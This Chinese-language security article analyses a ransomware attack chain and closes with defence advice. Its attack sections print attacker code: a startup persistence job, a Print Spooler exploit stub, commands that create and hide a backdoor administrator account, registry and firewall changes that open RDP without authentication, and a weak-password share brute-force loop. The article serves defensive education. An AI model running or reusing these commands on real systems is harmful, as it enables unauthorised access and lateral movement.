一、攻击入口：恶意载荷的隐蔽投递

勒索软件攻击的第一阶段通常通过社会工程学手段实现初始渗透。攻击者可能通过钓鱼邮件、水坑攻击或供应链污染等方式，诱导用户下载伪装成正常文件的恶意程序。以某托管仓库中的典型案例为例，攻击者使用混淆后的二进制文件（如aRX.exe）作为初始载荷，该文件具备以下特征：

1. 动态域名解析：通过短周期更新的C2域名规避静态检测，域名生成算法（DGA）可每日生成数百个候选域名
2. 反沙箱技术：检测鼠标移动、窗口焦点等用户交互行为，仅在确认处于真实环境时执行解密逻辑
3. 内存加载：使用Process Hollowing技术将有效载荷注入合法进程（如svchost.exe），避免磁盘落地检测

当用户执行该文件后，恶意代码会立即建立持久化机制，包括：

# 典型持久化注册示例
$trigger = New-JobTrigger -AtStartup -RandomDelay 00:00:30
Register-ScheduledJob -Name "SystemUpdate" -ScriptBlock {
    Start-Process "C:\Windows\temp\tzt.exe" -WindowStyle Hidden
} -Trigger $trigger

二、横向渗透：自动化脚本的协同攻击

完成初始驻留后，攻击者通过PowerShell脚本实现自动化渗透。某攻击样本中使用的updt.ps1脚本包含多层加密的混淆代码，其核心功能包括：

1. 二级载荷下载：通过HTTPS协议从分布式CDN节点获取加密的system.bat文件，使用RC4算法解密后重命名为tzt.bat
2. 系统权限提升：利用Print Spooler漏洞（CVE-2021-34527）或本地提权漏洞获取SYSTEM权限
3. 网络发现：执行net view和arp -a命令枚举局域网内活跃主机，为后续横向移动做准备

关键代码片段解析：

# 漏洞利用模块（简化示例）
function Exploit-PrintSpooler {
    $spoolerPath = "C:\Windows\System32\spoolsv.exe"
    $payload = [System.Convert]::FromBase64String("JWJhc2U2NGRhdGE...")
    [System.IO.File]::WriteAllBytes("$env:TEMP\spool_patch.dll", $payload)
    # 通过DLL注入触发漏洞
}

三、系统控制：RDP服务的暴力启用

最终攻击阶段通过tzt.bat脚本实现系统控制权的完全接管，其执行流程包含三个关键步骤：

1. 用户账户创建

@echo off
net user SystemHelp "P@ssw0rd123!" /ADD
net localgroup Administrators SystemHelp /ADD

该脚本创建具有管理员权限的隐藏账户，并通过修改注册表实现账户隐藏：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"SystemHelp"=dword:00000000

2. RDP服务配置

通过修改以下注册表项启用远程桌面：

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000

同时配置防火墙规则放行3389端口：

New-NetFirewallRule -DisplayName "RDP Allow" -Direction Inbound -LocalPort 3389 -Protocol TCP -Action Allow

3. 横向移动准备

脚本会扫描局域网内存活主机，并尝试使用弱密码字典进行爆破：

for /f "tokens=1,2 delims=:" %%a in (ip_list.txt) do (
    ping -n 1 %%a | find "TTL=" >nul
    if !errorlevel! equ 0 (
        echo Trying %%a...
        net use \\%%a\C$ /user:administrator "P@ssw0rd" 2>nul
    )
)

四、防御体系构建建议

针对此类多阶段攻击，建议采用纵深防御策略：

1. 终端防护层

• 部署EDR解决方案，启用行为监控和内存防护
• 限制PowerShell执行策略为Restricted或AllSigned
• 定期审计系统账户和注册表关键项

2. 网络防护层

• 实施零信任架构，严格控制RDP访问权限
• 使用网络分段技术隔离关键业务系统
• 部署欺骗防御系统诱捕攻击行为

3. 响应处置层

• 建立自动化响应剧本，隔离受感染主机
• 使用威胁情报平台追踪攻击者基础设施
• 定期进行红蓝对抗演练验证防御效果

五、技术演进趋势

当前勒索软件攻击呈现三个显著趋势：

1. 无文件化：越来越多攻击使用LOLBins（Living-off-the-Land Binaries）和内存驻留技术
2. 供应链污染：通过软件更新机制分发恶意载荷成为新途径
3. 双重勒索：在加密数据同时窃取敏感信息进行二次威胁

安全团队需要持续更新检测规则库，重点关注异常进程注入、计划任务创建、远程连接建立等关键行为。建议采用行为分析引擎结合机器学习模型，提升对未知威胁的识别能力。

通过深入理解攻击者的技术手段，企业可以构建更有效的防御体系。安全建设不是单一产品的堆砌，而是需要从人员、流程、技术三个维度形成闭环，持续提升安全运营能力。